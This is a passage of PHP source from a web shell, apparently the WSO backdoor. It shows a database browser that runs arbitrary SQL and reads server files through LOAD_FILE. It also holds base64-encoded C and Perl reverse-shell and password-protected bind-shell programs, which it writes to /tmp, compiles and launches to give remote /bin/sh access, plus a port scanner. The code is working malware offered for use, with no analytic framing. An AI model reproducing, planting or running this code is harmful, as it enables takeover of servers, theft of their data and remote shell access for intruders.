"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr>
"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); $num = $db->fetch(); $num = $num['n']; echo "<span>".$_POST['p2']."</span> ($num) "; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; else echo ($i+1)," "; if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo '<th>'.$key.'</th>'; reset($item); $title=true; echo ''; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo '<i>null</i>'; else echo ''.nl2br(htmlspecialchars($value)).''; } echo ''; } echo ''; } else { echo '<div>Error: '.htmlspecialchars($db->error()).'</div>'; } } echo "
<textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; echo ""; } echo "
<br/>
<span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'>
"; if(@$_POST['p1'] == 'loadfile') { $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); $file = $db->fetch(); echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } echo '</div>'; printFooter();}// Sql end -------------------------// Network go --------------------function actionNetwork() { printHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools

<div class=content>
<span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
<span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>

"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; printFooter();}// Network end --------------------// Port Scanner go --------------------function actionPortScanner() { printHeader(); echo '

Port Scanner

'; echo '<div class="content">'; echo '
'; if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is <font color=lime>open</font>
'; } flush(); } } else { echo '<br /><br />
Host: <br /><br /> Port start: <br /><br /> Port end:<br /><br />
<br /><br />'; } echo '</div>'; printFooter(); }// Port Scanner end --------------------if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'FilesMan';if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']);